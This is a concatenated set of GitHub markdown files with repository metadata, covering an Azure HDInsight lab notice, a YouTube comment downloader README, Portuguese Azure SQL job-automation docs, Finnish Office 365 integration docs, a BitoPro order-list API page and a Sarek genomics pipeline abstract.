Labs/Big Data and Analytics/Hadoop on Azure HDInsight/HDInsight Hadoop HOL.md
365Academic/AcademicContent
8f35d9bb8a7c9054a134f6c69bf125e64be8f7f2
[ "MIT" ]
34
2020-03-27T00:03:03.000Z
2022-02-27T10:18:05.000Z
Labs/Big Data and Analytics/Hadoop on Azure HDInsight/HDInsight Hadoop HOL.md
365Academic/AcademicContent
8f35d9bb8a7c9054a134f6c69bf125e64be8f7f2
[ "MIT" ]
213
2020-03-25T22:32:53.000Z
2022-03-24T05:29:58.000Z
# Processing Big Data with Apache Hadoop on Azure HDInsight This lab has been deprecated and replaced by a lab on [Microsoft Learn](https://docs.microsoft.com/learn?WT.mc_id=academic-9938-jabenn), our hands on, self-guided learning platform: [Building Open Source Software (OSS) Analytics Solutions with Azure HDInsight](https://docs.microsoft.com/learn/paths/build-oss-analytical-solutions-az-hdinsight//?WT.mc_id=academic-9938-jabenn) ![Learn module logo](https://docs.microsoft.com/learn/achievements/building-oss-analytical-solutions-with-azure-hdinsight.svg?WT.mc_id=academic-9938-jabenn)
74.625
194
0.805695
eng_Latn
0.52917
6f4988f850eaf93e56b6ad664320fe3b619c7184
897
md
Markdown
README.md
Koomook/youtube-comment-downloader
50ba014fcf368f27b7551a0b898ff20c811a370c
[ "MIT" ]
5
2021-05-09T12:51:32.000Z
2021-11-04T11:02:54.000Z
README.md
Koomook/youtube-comment-downloader
50ba014fcf368f27b7551a0b898ff20c811a370c
[ "MIT" ]
null
null
null
README.md
Koomook/youtube-comment-downloader
50ba014fcf368f27b7551a0b898ff20c811a370c
[ "MIT" ]
3
2021-05-12T12:14:05.000Z
2021-10-06T05:19:54.000Z
# youtube-comment-downloader Simple script for downloading Youtube comments without using the Youtube API. The output is in line delimited JSON. ### Dependencies * Python 2.7+ * requests * lxml * cssselect The python packages can be installed with pip install requests pip install lxml pip install cssselect ### Usage ``` usage: downloader.py [--help] [--youtubeid YOUTUBEID] [--output OUTPUT] Download Youtube comments without using the Youtube API optional arguments: --help, -h Show this help message and exit --youtubeid YOUTUBEID, -y YOUTUBEID ID of Youtube video for which to download the comments --output OUTPUT, -o OUTPUT Output filename (output format is line delimited JSON) ``` For Youtube IDs starting with - (dash) you will need to run the script with: `-y=-idwithdash` or `--youtubeid=-idwithdash`
28.03125
115
0.697882
eng_Latn
0.963675
6f499d7f5d8f3624bb7b19f40d85b490343eddbd
24,284
md
Markdown
articles/sql-database/sql-database-job-automation-overview.md
ialeksander1/azure-docs.pt-br
d5a7a2c2d4a31282f49bd1e35036cb1939911974
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/sql-database/sql-database-job-automation-overview.md
ialeksander1/azure-docs.pt-br
d5a7a2c2d4a31282f49bd1e35036cb1939911974
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/sql-database/sql-database-job-automation-overview.md
ialeksander1/azure-docs.pt-br
d5a7a2c2d4a31282f49bd1e35036cb1939911974
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Automação de trabalho description: Usar a Automação de Trabalhos para executar scripts T-SQL (Transact-SQL) em um conjunto de um ou mais bancos de dados SQL do Azure services: sql-database ms.service: sql-database ms.custom: '' ms.devlang: '' ms.topic: overview author: jovanpop-msft ms.author: jovanpop ms.reviewer: carlr ms.date: 03/10/2020 ms.openlocfilehash: dcaaf3c2f793e7148e1695cdfaa68c768db5fff6 ms.sourcegitcommit: c2065e6f0ee0919d36554116432241760de43ec8 ms.translationtype: HT ms.contentlocale: pt-BR ms.lasthandoff: 03/26/2020 ms.locfileid: "79215454" --- # <a name="automate-management-tasks-using-database-jobs"></a>Automatizar tarefas de gerenciamento usando trabalhos de banco de dados O Banco de Dados SQL do Azure permite que você crie e agende trabalhos que podem ser executados periodicamente em um ou vários bancos de dados para executar consultas T-SQL e executar tarefas de manutenção. Cada trabalho registrará o status de execução e também repetirá as operações se ocorrer uma falha. É possível definir o banco de dados de destino ou grupos de bancos de dados SQL do Azure em que o trabalho será executado e também definir agendas para executar um trabalho. Um trabalho lida com a tarefa de fazer logon no banco de dados de destino. Você também define, atualiza e mantém os scripts T-SQL a serem executados em um grupo de bancos de dados SQL do Azure. ## <a name="when-to-use-automated-jobs"></a>Quando usar trabalhos automatizados Há vários cenários, quando você pode usar a automação de trabalhos: - Automatizar tarefas de gerenciamento e, em seguida, agendá-las para serem executadas a todo dia da semana, após horas etc. - Implantar alterações de esquema, gerenciamento de credenciais, coleta de dados de desempenho ou coleta de telemetria do locatário (cliente). - Atualizar dados de referência (informações comuns a todos os bancos de dados), carregar dados do armazenamento de blobs do Azure. - Recompilar índices para melhorar o desempenho da consulta. Configure trabalhos para serem executados em um conjunto de bancos de dados de modo recorrente, por exemplo, fora dos horários de pico. - Coletar resultados de consulta de um conjunto de bancos de dados em uma tabela central em uma base contínua. Consultas de desempenho podem ser executadas continuamente e configuradas para disparar tarefas adicionais a serem executadas. - Coletar dados para relatórios - Agregue dados de uma coleção de bancos de dados SQL do Azure em uma tabela de destino único. - Executar consultas de processamento de dados mais longas em um grande conjunto de bancos de dados, por exemplo, a coleta de telemetria do cliente. Resultados são coletados em uma única tabela de destino para análise posterior. - Movimentações de dados - Crie trabalhos que replicam as alterações feitas em seus bancos de dados para outros bancos de dados ou colete atualizações feitas em bancos de dados remotos e aplique o que foi alterado no banco de dados. - Crie trabalhos que carregam dados de ou para seus bancos de dados usando o SSIS (SQL Server Integration Services). ## <a name="overview"></a>Visão geral As tecnologias de agendamento de trabalhos a seguir estão disponíveis no Banco de Dados SQL do Azure: - Os **Trabalhos do SQL Agent** são um componente de agendamento de trabalho do SQL Server clássico e eficaz disponível na Instância Gerenciada. Os Trabalhos do SQL Agent não estão disponíveis em bancos de dados individuais linguagem SQL do Azure. - Os **Trabalhos de banco de dados elástico (versão prévia)** são os serviços de Agendamento de Trabalhos que executam trabalhos personalizados em um ou muitos Bancos de Dados SQL do Azure. Vale a pena observar algumas diferenças entre o SQL Agent (disponível localmente e como parte da Instância Gerenciada do Banco de Dados SQL) e o agente Trabalho Elástico do Banco de Dados (disponível para bancos de dados individuais no Banco de Dados SQL do Azure e para bancos de dados no SQL Data Warehouse). | |Trabalhos elásticos |SQL Agent | |---------|---------|---------| |Escopo | Qualquer número de bancos de dados SQL do Azure e/ou data warehouses na mesma nuvem do Azure do agente de trabalho. Os destinos podem estar em diferentes servidores, assinaturas e/ou regiões do Banco de Dados SQL. <br><br>Os grupos de destino podem ser compostos de bancos de dados ou data warehouses individuais ou dos bancos de dados em um servidor, pool ou mapa de fragmentos (enumerados dinamicamente no runtime do trabalho). | Qualquer banco de dados individual na mesma instância do SQL Server que o SQL Agent. | |Ferramentas e APIs com suporte | Portal, PowerShell, T-SQL, Azure Resource Manager | T-SQL, SSMS (SQL Server Management Studio) | ## <a name="sql-agent-jobs"></a>Trabalhos do SQL Agent Os trabalhos do SQL Agent são uma série especificada de scripts T-SQL com relação ao seu banco de dados. Use trabalhos para definir uma tarefa administrativa que pode ser executada uma ou mais vezes e monitorada quanto a êxito ou falha. Um trabalho pode ser executado em um servidor local ou em vários servidores remotos. Os Trabalhos do SQL Agent são um componente interno do Mecanismo de Banco de Dados executado dentro do serviço de Instância Gerenciada. Há vários conceitos importantes em Trabalhos do SQL Agent: - **Etapas de trabalho** conjunto de uma ou mais etapas que devem ser executadas dentro do trabalho. Para cada etapa de trabalho, é possível definir a estratégia de repetição e a ação que deverá acontecer se a etapa de trabalho tiver êxito ou falhar. - **Agendas** definem quando o trabalho deve ser executado. - **Notificações** permitem que você defina regras que serão usadas para notificar operadores por email após a conclusão do trabalho. ### <a name="job-steps"></a>Etapas de trabalho As etapas do Trabalho do SQL Agent são sequências de ações que o SQL Agent deve executar. Cada etapa tem a seguinte etapa que deverá ser executada se a etapa tiver êxito ou falhar, número de repetições em caso de falha. O SQL Agent permite que você crie diferentes tipos das etapas de trabalho, como a etapa de trabalho Transact-SQL que executa um único lote do Transact-SQL com relação ao banco de dados ou as etapas comando/PowerShell do sistema operacional que podem executar um script personalizado do sistema operacional; as etapas de trabalho do SSIS permitem que você carregue dados usando o runtime do SSIS ou as etapas de [replicação](sql-database-managed-instance-transactional-replication.md) que podem publicar alterações do seu banco de dados em outros. [Replicação transacional](sql-database-managed-instance-transactional-replication.md) é um recurso do Mecanismo de Banco de Dados que permite que você publique as alterações feitas em uma ou várias tabelas em um banco de dados e publique/distribua-as a um conjunto de bancos de dados do assinante. A publicação das alterações é implementada usando os seguintes tipos de etapa de trabalho do SQL Agent: - Leitor do log de transações. - Instantâneo. - Distribuidor. Outros tipos de etapas de trabalho não têm suporte no momento, incluindo: - Não há suporte para a etapa de trabalho de replicação de mesclagem. - Não há suporte para leitor de fila. - O Analysis Services não é suportado ### <a name="job-schedules"></a>Agendas de trabalho Uma agenda especifica quando um trabalho é executado. Mais de um trabalho pode ser executado na mesma agenda e mais de uma agenda pode ser aplicada ao mesmo trabalho. Uma agenda pode definir as condições a seguir para a hora em que um trabalho é executado: - Sempre que uma instância é reiniciada (ou quando o SQL Server Agent é iniciado). O trabalho é ativado após cada failover. - Uma vez, em uma data e hora específicas, que é útil para a execução atrasada de algum trabalho. - Em uma agenda recorrente. > [!Note] > No momento, a Instância Gerenciada não permite que você inicie um trabalho quando a instância estiver “ociosa”. ### <a name="job-notifications"></a>Notificações de trabalho Os trabalhos do SQL Agent permitem que você receba notificações quando o trabalho é concluído com êxito ou com falha. É possível receber a notificações por email. Primeiro, você precisaria configurar a conta de email que será usada para enviar as notificações por email e atribuir a conta ao perfil do email chamado `AzureManagedInstance_dbmail_profile`, conforme mostrado no exemplo a seguir: ```sql -- Create a Database Mail account EXECUTE msdb.dbo.sysmail_add_account_sp @account_name = 'SQL Agent Account', @description = 'Mail account for Azure SQL Managed Instance SQL Agent system.', @email_address = '$(loginEmail)', @display_name = 'SQL Agent Account', @mailserver_name = '$(mailserver)' , @username = '$(loginEmail)' , @password = '$(password)' -- Create a Database Mail profile EXECUTE msdb.dbo.sysmail_add_profile_sp @profile_name = 'AzureManagedInstance_dbmail_profile', @description = 'E-mail profile used for messages sent by Managed Instance SQL Agent.' ; -- Add the account to the profile EXECUTE msdb.dbo.sysmail_add_profileaccount_sp @profile_name = 'AzureManagedInstance_dbmail_profile', @account_name = 'SQL Agent Account', @sequence_number = 1; ``` Você também precisaria habilitar o Database Mail na Instância Gerenciada: ```sql GO EXEC sp_configure 'show advanced options', 1; GO RECONFIGURE; GO EXEC sp_configure 'Database Mail XPs', 1; GO RECONFIGURE ``` É possível notificar o operador de que algo aconteceu com seus trabalhos do SQL Agent. Um operador define informações de contato para um indivíduo responsável pela manutenção de uma ou mais Instâncias Gerenciadas. Algumas vezes, as responsabilidades do operador são atribuídas a um indivíduo. Em sistemas com várias Instâncias Gerenciadas ou SQL Servers, muitos indivíduos podem compartilhar as responsabilidades do operador. Um operador não contém informações de segurança nem define uma entidade de segurança. É possível criar operadores usando o SSMS ou o script Transact-SQL mostrado no exemplo a seguir: ```sql EXEC msdb.dbo.sp_add_operator @name=N'Mihajlo Pupun', @enabled=1, @email_address=N'mihajlo.pupin@contoso.com' ``` É possível modificar qualquer trabalho e atribuir operadores que serão notificado por email se o trabalho for concluído, falhar ou tiver êxito usando o SSMS ou o seguinte script Transact-SQL: ```sql EXEC msdb.dbo.sp_update_job @job_name=N'Load data using SSIS', @notify_level_email=3, -- Options are: 1 on succeed, 2 on failure, 3 on complete @notify_email_operator_name=N'Mihajlo Pupun' ``` ### <a name="sql-agent-job-limitations"></a>Limitações de trabalho do SQL Agent Alguns recursos do SQL Agent disponíveis no SQL Server não são compatíveis com a Instância Gerenciada: - As configurações do agente SQL são somente leitura. O procedimento `sp_set_agent_properties` não tem suporte na Instância Gerenciada. - No momento, não há suporte para habilitar/desabilitar o SQL Agent na Instância Gerenciada. O SQL Agent sempre está em execução. - As notificações são parcialmente suportadas - Não há suporte para pager. - Não há suporte a NetSend. - Não há suporte para alertas. - Não há suporte para proxies. - Não há suporte para Eventlog. Para obter informações sobre o SQL Server Agent, consulte [SQL Server Agent](https://docs.microsoft.com/sql/ssms/agent/sql-server-agent). ## <a name="elastic-database-jobs-preview"></a>Trabalhos de Banco de Dados Elástico (versão prévia) Os **Trabalhos de Banco de Dados Elástico** permitem executar um ou mais scripts T-SQL em paralelo, em um grande número de bancos de dados, seja com agendamento ou sob demanda. **Execute trabalhos em qualquer combinação de bancos de dados**: um ou mais bancos de dados individuais, todos os bancos de dados em um servidor, todos os bancos de dados em um pool elástico ou mapa de fragmentos, com a flexibilidade extra de poder incluir ou excluir qualquer banco de dados. **Os trabalhos podem ser executados em diversos servidores e pools, até mesmo em bancos de dados presentes em assinaturas diferentes.** Os servidores e pools são enumerados dinamicamente no runtime e, portanto, os trabalhos são executados em todos os bancos de dados existentes no grupo de destino no momento da execução. A imagem a seguir mostra um agente de trabalho executando trabalhos em diferentes tipos de grupos de destino: ![Modelo conceitual do agente de Trabalho Elástico](media/elastic-jobs-overview/conceptual-diagram.png) ### <a name="elastic-job-components"></a>Componentes do Trabalho Elástico |Componente | Descrição (confira mais detalhes abaixo da tabela) | |---------|---------| |[**Agente de Trabalho Elástico**](#elastic-job-agent) | O recurso do Azure que você cria para executar e gerenciar trabalhos. | |[**Banco de dados de trabalhos**](#job-database) | Um banco de dados SQL do Azure que o agente de trabalho usa para armazenar dados relacionados ao trabalho, definições de trabalho, etc. | |[**Grupo de destino**](#target-group) | O conjunto de servidores, pools, bancos de dados e mapas de fragmentos nos quais o trabalho é executado. | |[**Trabalho**](#job) | Um trabalho é uma unidade de trabalho composta de uma ou mais [etapas de trabalho](#job-step). As etapas de trabalho especificam qual script T-SQL deve ser executado, bem como outros detalhes necessários para a execução do script. | #### <a name="elastic-job-agent"></a>Agente de trabalho elástico Um agente de Trabalho Elástico é o recurso do Azure para criar, executar e gerenciar trabalhos. O agente de Trabalho Elástico é um recurso do Azure que você cria no portal (há suporte também para [PowerShell](elastic-jobs-powershell.md) e REST). A criação de um **agente de Trabalho Elástico** requer um banco de dados SQL já criado. O agente configura esse banco de dados existente como o [*Banco de dados do trabalho*](#job-database). O agente de Trabalho Elástico é gratuito. O banco de dados de trabalhos usa a mesma taxa de cobrança de qualquer banco de dados SQL. #### <a name="job-database"></a>Banco de dados de trabalhos O *banco de dados de trabalhos* é usado para definir os trabalhos e rastrear o status e o histórico das execuções de trabalho. O *Banco de dados de trabalhos* também é usado para armazenar metadados de agente, logs, resultados e definições de trabalho. Além disso, ele contém muitos procedimentos armazenados úteis e outros objetos de banco de dados usados para criar, executar e gerenciar trabalhos usando o T-SQL. Na versão prévia atual, um banco de dados existente SQL do Azure (S0 ou superior) é necessário para criar um agente de Trabalho Elástico. O *Banco de dados de trabalhos* não precisa ser literalmente novo, mas deve ser um objetivo de serviço limpo, vazio, S0 ou superior. O objetivo de serviço recomendado do *Banco de dados de trabalhos* é S1 ou superior, mas a opção ideal depende das necessidades de desempenho dos trabalhos: o número de etapas de trabalho, o número de destinos de trabalho e a frequência com que os trabalhos são executados. Por exemplo, um banco de dados S0 pode ser suficiente para um agente de trabalho que executa alguns trabalhos por hora direcionado a menos de dez bancos de dados, mas a execução de um trabalho por minuto pode não ser rápida o suficiente com um banco de dados S0, e uma camada de serviço superior pode ser melhor. Se as operações no banco de dados de trabalhos forem mais lentas do que o esperado, [monitore](sql-database-monitor-tune-overview.md#sql-database-resource-monitoring) o desempenho do banco de dados e a utilização de recursos no banco de dados de trabalhos durante períodos de lentidão usando o portal do Azure ou a DMV [sys.dm_db_resource_stats](https://docs.microsoft.com/sql/relational-databases/system-dynamic-management-views/sys-dm-db-resource-stats-azure-sql-database). Se a utilização de um recurso, como CPU, E/S de Dados ou Gravação de Log, se aproximar de 100% e se correlacionar com períodos de lentidão, considere a possibilidade de dimensionar de maneira incremental o banco de dados para objetivos de serviço superiores (no [modelo de DTU](sql-database-service-tiers-dtu.md) ou no [modelo de vCore](sql-database-service-tiers-vcore.md)) até que o desempenho do banco de dados de trabalhos seja suficientemente aprimorado. ##### <a name="job-database-permissions"></a>Permissões de banco de dados de trabalhos Durante a criação do agente de trabalho, um esquema, tabelas e uma função chamada *jobs_reader* são criados no *Banco de dados de trabalhos*. A função, projetada para oferecer aos administradores um controle de acesso mais rígido para monitoramento de trabalho, tem a seguinte permissão: |Nome da função |permissões de esquema 'jobs' |permissões de esquema 'jobs_internal' | |---------|---------|---------| |**jobs_reader** | SELECT | Nenhum | > [!IMPORTANT] > Considere as implicações de segurança antes de conceder acesso ao *banco de dados de trabalhos* como um administrador de banco de dados. Um usuário mal-intencionado com permissões para criar ou editar tarefas pode criar ou editar um trabalho que usa uma credencial armazenada para se conectar a um banco de dados sob controle do usuário mal-intencionado, o que permitiria que o usuário mal-intencionado determinasse a senha da credencial. #### <a name="target-group"></a>Grupo de destino Um *grupo de destino* define o conjunto de bancos de dados em que uma etapa de trabalho será executada. Um grupo de destino pode conter qualquer quantidade ou combinação dos seguintes itens: - **Servidor do Banco de Dados SQL**: se um servidor for especificado, todos os bancos de dados existentes no servidor no momento da execução do trabalho farão parte do grupo. A credencial de banco de dados mestre deve ser fornecida para que o grupo possa ser enumerado e atualizado antes da execução do trabalho. - **Pool elástico**: se um pool elástico for especificado, todos os bancos de dados presentes no pool elástico no momento da execução do trabalho farão parte do grupo. Assim como ocorre para servidores, a credencial de banco de dados mestre deve ser fornecida para que o grupo possa ser atualizado antes da execução do trabalho. - **Banco de dados único**: especifica um ou mais bancos de dados individuais como parte do grupo. - **Mapa de fragmentos**: bancos de dados de um mapa de fragmentos. > [!TIP] > No momento da execução do trabalho, a *enumeração dinâmica* reavalia o conjunto de bancos de dados em grupos de destino que incluem servidores ou grupos. A enumeração dinâmica garante que os **trabalhos serão executados em todos os bancos de dados existentes no servidor ou pool no momento da execução do trabalho**. A reavaliação da lista de bancos de dados no runtime é especialmente útil para cenários em que a associação de pools ou servidores é alterada com frequência. É possível incluir ou excluir pools e bancos de dados individuais do grupo. Isso permite a criação de um grupo de destino com qualquer combinação de bancos de dados. Por exemplo, você pode adicionar um servidor a um grupo de destino, mas excluir bancos de dados específicos em um pool elástico (ou excluir um pool inteiro). Um grupo de destino pode incluir bancos de dados em várias assinaturas e em várias regiões. Observe que as execuções entre regiões têm maior latência do que as execuções dentro da mesma região. Os exemplos a seguir mostram como definições de grupo-alvo diferentes são enumeradas dinamicamente no momento da execução do trabalho para determinar em quais bancos de dados o trabalho será executado: ![Exemplos de grupo de destino](media/elastic-jobs-overview/targetgroup-examples1.png) O **exemplo 1** mostra um grupo de destino que consiste em uma lista de bancos de dados individuais. Quando uma etapa de trabalho é executada usando esse grupo de destino, a ação da etapa do trabalho é executada em cada um dos bancos de dados.<br> O **exemplo 2** mostra um grupo de destino que contém um Azure SQL Server como destino. Quando uma etapa de trabalho é executada usando esse grupo de destino, o servidor é enumerado dinamicamente para determinar a lista de bancos de dados que estão atualmente no servidor. A ação da etapa de trabalho será executada em cada um desses bancos de dados.<br> O **exemplo 3** mostra um grupo de destino semelhante ao do *exemplo 2*, mas o banco de dados individual é especificamente excluído. A ação da etapa de trabalho *não* será executada no banco de dados excluído.<br> O **exemplo 4** mostra um grupo de destino que contém um pool elástico como destino. Semelhante ao *exemplo 2*, o pool será enumerado dinamicamente no tempo de execução do trabalho para determinar a lista de bancos de dados no pool. <br><br> ![Exemplos de grupo de destino](media/elastic-jobs-overview/targetgroup-examples2.png) O **exemplo 5** e o **exemplo 6** mostram cenários avançados em que os SQL Servers do Azure, os pools elásticos e os bancos de dados podem ser combinados usando regras de inclusão e exclusão.<br> O **exemplo 7** mostra que os fragmentos em um mapa de fragmentos também podem ser avaliados no tempo de execução do trabalho. > [!NOTE] > O próprio Banco de dados de trabalhos pode ser o destino de um trabalho. Nesse cenário, o Banco de dados de trabalhos é tratado da mesma forma que qualquer outro banco de dados de destino. O usuário do trabalho precisa ser criado e receber permissões suficientes no Banco de dados de trabalhos, e a credencial no escopo do banco de dados para o usuário do trabalho também precisa existir no banco de dados de trabalhos, assim como ele faz para qualquer outro banco de dados de destino. > #### <a name="job"></a>Trabalho Um *trabalho* é uma unidade de trabalho executada com agendamento ou como um único trabalho. Um trabalho consiste em uma ou mais *etapas de trabalho*. ##### <a name="job-step"></a>Etapa de trabalho Cada etapa de trabalho especifica um script T-SQL a ser executado, um ou mais grupos de destino no qual executar o script T-SQL e as credenciais de que o agente de trabalho precisa para se conectar ao banco de dados de destino. Cada etapa de trabalho tem tempo limite e políticas de repetição personalizáveis e pode, opcionalmente, especificar parâmetros de saída. #### <a name="job-output"></a>Saída do trabalho O resultado das etapas de um trabalho em cada banco de dados de destino é registrado em detalhes, e a saída do script pode ser capturada em uma tabela específica. Você pode especificar um banco de dados para salvar os dados retornados de um trabalho. #### <a name="job-history"></a>Histórico de trabalho O histórico de execução do trabalho é armazenado no *Banco de dados de trabalhos*. Um trabalho de limpeza do sistema limpa o histórico de execuções com mais de 45 dias. Para remover o histórico de menos de 45 dias, chame o procedimento armazenado **sp_purge_history** no *Banco de dados de trabalhos*. ### <a name="agent-performance-capacity-and-limitations"></a>Desempenho, capacidade e limitações do agente Os Trabalhos Elásticos usam o mínimo de recursos de computação enquanto aguardam a conclusão dos trabalhos de longa execução. Dependendo do tamanho do grupo de destino de bancos de dados e do tempo de execução desejado para um trabalho (número de trabalhos simultâneos), o agente requer quantidades diferentes de computação e desempenho do *banco de dados de trabalhos* (quanto mais destinos e trabalhos, maior será a quantidade de computação necessária). Atualmente, a versão prévia está limitada a 100 trabalhos simultâneos. #### <a name="prevent-jobs-from-reducing-target-database-performance"></a>Impedir que os trabalhos reduzam o desempenho do banco de dados de destino Para que os recursos não fiquem sobrecarregados ao executar trabalhos em bancos de dados em um pool elástico do SQL, os trabalhos podem ser configurados para limitar o número de bancos de dados em que o trabalho pode ser executado simultaneamente. ## <a name="next-steps"></a>Próximas etapas - [O que é o SQL Server Agent](https://docs.microsoft.com/sql/ssms/agent/sql-server-agent) - [Como criar e gerenciar trabalhos elásticos](elastic-jobs-overview.md) - [Criar e gerenciar trabalhos elásticos usando o PowerShell](elastic-jobs-powershell.md) - [Criar e gerenciar Trabalhos Elásticos usando T-SQL (Transact-SQL)](elastic-jobs-tsql.md)
83.737931
935
0.786608
por_Latn
0.99995
6f49e019cfbd95bf631da70e4ef208e860a1136d
1,956
md
Markdown
powerapps-docs/maker/common-data-service/sharepoint-onedrive-onenote-intro.md
MakelaM/powerapps-docs.fi-fi
b3e51111a33011384d41249fed6fb2fa70c7b43e
[ "CC-BY-4.0", "MIT" ]
null
null
null
powerapps-docs/maker/common-data-service/sharepoint-onedrive-onenote-intro.md
MakelaM/powerapps-docs.fi-fi
b3e51111a33011384d41249fed6fb2fa70c7b43e
[ "CC-BY-4.0", "MIT" ]
null
null
null
powerapps-docs/maker/common-data-service/sharepoint-onedrive-onenote-intro.md
MakelaM/powerapps-docs.fi-fi
b3e51111a33011384d41249fed6fb2fa70c7b43e
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: 'SharePoint-, OneNote- ja OneDrive-integrointi Common Data Service -palvelun kanssa | Microsoft Docs' description: Lisätietoja Office 365 -palveluiden integroinnista Common Data Service -palvelun kanssa. author: Mattp123 manager: kvivek ms.service: powerapps ms.component: cds ms.topic: conceptual ms.date: 08/02/2019 ms.author: matp search.audienceType: - maker search.app: - PowerApps - D365CE --- # <a name="sharepoint-onenote-and-onedrive-integration-with-common-data-service"></a>SharePoint-, OneNote- ja OneDrive-integrointi Common Data Service -palvelun kanssa Common Data Service tukee SharePoint-, OneDrive- ja OneNote-integrointia. Integrointi näiden palveluiden kanssa edellyttää, että SharePoint-integrointi on otettu käyttöön. |Office 365 -palvelu |Kuvaus | Lisätietoja | |---------|---------|---------|---------| |SharePoint | Sovelluksen käyttäjät voivat hallinnoida yleisiä asiakirjatyyppejä, kuten Word-, Excel-, PowerPoint- ja OneNote-asiakirjoja, ja luoda kansioita, joihin nämä asiakirjat tallennetaan ja joissa niitä voi hallinnoida saumattomasti Common Data Service -sovellusten SharePointin avulla. | [Asiakirjojen hallinta SharePointin avulla](/dynamics365/customer-engagement/admin/manage-documents-using-sharepoint) <br /> <br /> [Asenna SharePoint-integraatio](/dynamics365/customer-engagement/admin/set-up-sharepoint-integration) | |OneDrive for Business | Sovelluksen käyttäjät voivat luoda ja hallinnoida yksityisiä asiakirjoja, joita voi käyttää Common Data Service -sovellusten avulla. | [Ota käyttöön OneDrive for Business](/dynamics365/customer-engagement/admin/enable-onedrive-for-business) | |OneNote | Sovelluksen käyttäjät voivat käyttää OneNote-ratkaisua muistiinpanojen tekemiseen ja tarkasteluun Common Data Service -tietueissa. | [Asenna OneNote-integraatio](/dynamics365/customer-engagement/admin/set-up-onenote-integration-in-dynamics-365) |
69.857143
546
0.775562
fin_Latn
0.982593
6f4a87b7f5fe74f43c6e3b221d03ecdbeed6d748
2,462
md
Markdown
v3-1/rest-1/auth/order-list.md
superj80820/bitopro-offical-api-docs
a6727461e29bd58f3625e299da6c15218dfeefc5
[ "MIT" ]
null
null
null
v3-1/rest-1/auth/order-list.md
superj80820/bitopro-offical-api-docs
a6727461e29bd58f3625e299da6c15218dfeefc5
[ "MIT" ]
null
null
null
v3-1/rest-1/auth/order-list.md
superj80820/bitopro-offical-api-docs
a6727461e29bd58f3625e299da6c15218dfeefc5
[ "MIT" ]
null
null
null
# Get order list ## `GET` /orders/{pair} ## Rate limit Allow `1` request per second per IP. ## Parameters | Header | Path | Query | Type | Required | Description | Default | Range | Example | | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | | X-BITOPRO-APIKEY | | | string | Yes | [API Key](../authentication.md#api-key) | | | | | X-BITOPRO-PAYLOAD | | | string | Yes | [Payload](../authentication.md#payload) | | | | | X-BITOPRO-SIGNATURE | | | string | Yes | [Signature](../authentication.md#signature) | | | | | | pair | | string | Yes | The trading pair in format ${BASE}\_${QUOTE}, Please follow the [link](https://www.bitopro.com/fees) to check the pair list. | | | bito\_eth | | | | page | integer | No | The page number for the query. | 1 | | 1 | | | | active | bool | No | The flag to specify if only active\(in progress\) orders will return. | `false` | `true`, `false` | true | ## Response sample ```javascript { "data": [ { "action": "BUY", "avgExecutionPrice": "0", "bitoFee": "0", "executedAmount": "0", "fee": "0", "feeSymbol": "bito", "id": "887521192", "originalAmount": "1000", "pair": "bito_eth", "price": "0.005", "remainingAmount": "1000", "seq": "BITOETH8913789893", "status": 0, "timestamp": 1570591525592, "total": "0", "type": "LIMIT" }, { "action": "BUY", "avgExecutionPrice": "0", "bitoFee": "0", "condition": ">=", "executedAmount": "0", "fee": "0", "feeSymbol": "bito", "id": "SL-1133804403", "originalAmount": "1000", "pair": "bito_eth", "price": "0.05", "remainingAmount": "1000", "seq": "BITOETH4618822599", "status": -1, "stopPrice": "10", "timestamp": 1570591225827, "total": "0", "type": "STOP_LIMIT" }, { "action": "BUY", "avgExecutionPrice": "0", "bitoFee": "0", "condition": ">=", "executedAmount": "0", "fee": "0", "feeSymbol": "bito", "id": "SL-6256946008", "originalAmount": "1000", "pair": "bito_eth", "price": "0.05", "remainingAmount": "1000", "seq": "BITOETH2471338952", "status": -1, "stopPrice": "10", "timestamp": 1570591217063, "total": "0", "type": "STOP_LIMIT" } ], "page": 1, "totalPages": 1 } ``` [Back](../rest.md)
27.054945
174
0.502031
eng_Latn
0.210022
6f4ab2a16621d9f13c293c8ee2f66fe1ca9371ba
2,535
md
Markdown
docs/abstracts/2018-05-PMC.md
apeltzer/Sarek
bf3f262e622c8c76e906f14cc8d5a2685e3d2f3d
[ "MIT" ]
168
2019-05-28T13:51:05.000Z
2022-03-26T19:46:24.000Z
docs/abstracts/2018-05-PMC.md
apeltzer/Sarek
bf3f262e622c8c76e906f14cc8d5a2685e3d2f3d
[ "MIT" ]
377
2019-05-22T13:47:09.000Z
2022-03-31T08:01:24.000Z
docs/abstracts/2018-05-PMC.md
maxulysse/nf-core_sarek
d73a192827a43089e41f709da7e80a27a975ef27
[ "MIT" ]
176
2019-05-09T12:20:38.000Z
2022-03-31T14:35:28.000Z
# Keystone Symposia - Precision Medicine in Cancer - Stockholm, Sweden, 2018/05 ## Sarek, a workflow for WGS analysis of germline and somatic mutations Maxime Garcia 123*, Szilveszter Juhos 123*, Malin Larsson 456, Teresita Díaz de Ståhl 13, Johanna Sandgren 13, Jesper Eisfeldt 73, Sebastian DiLorenzo 85A, Marcel Martin B3C, Pall Olason 95A, Phil Ewels B2C, Björn Nystedt 95A*, Monica Nistér 13, Max Käller 2D, *Corresponding Author 1. Barntumörbanken, Dept. of Oncology Pathology; 2. Science for Life Laboratory; 3. Karolinska Institutet; 4. Dept. of Physics, Chemistry and Biology; 5. National Bioinformatics Infrastructure Sweden, Science for Life Laboratory; 6. Linköping University; 7. Clinical Genetics, Dept. of Molecular Medicine and Surgery; 8. Dept. of Medical Sciences; 9. Dept. of Cell and Molecular Biology; A. Uppsala University; B. Dept. of Biochemistry and Biophysics; C. Stockholm University; D. School of Biotechnology, Division of Gene Technology, Royal Institute of Technology We present Sarek, a complete Open Source pipeline to resolve germline and somatic variants from WGS data: it is written in Nextflow, a domain-specific language for workflow building. Sarek is based on GATK best practices to prepare short-read data, in parallel for a tumor/normal pair sample. After these preprocessing steps several variant callers scan the resulting BAM files; For structural variants we use Manta. Strelka and GATK HaplotypeCaller are used to find germline variants and for somatic calls we use MuTect2 and Strelka. Finally, we apply ASCAT to estimate sample heterogeneity, ploidy and CNVs. Checkpoints allow to start the software from different states. At the end of the analysis the resulting VCF files are annotated to facilitate further downstream processing. The flow is capable of accommodating further variant callers. It can also process only the normal sample, tumor/normal pairs or even normal, tumor and several relapse samples. Besides variant calls, the workflow provides quality controls presented by MultiQC. 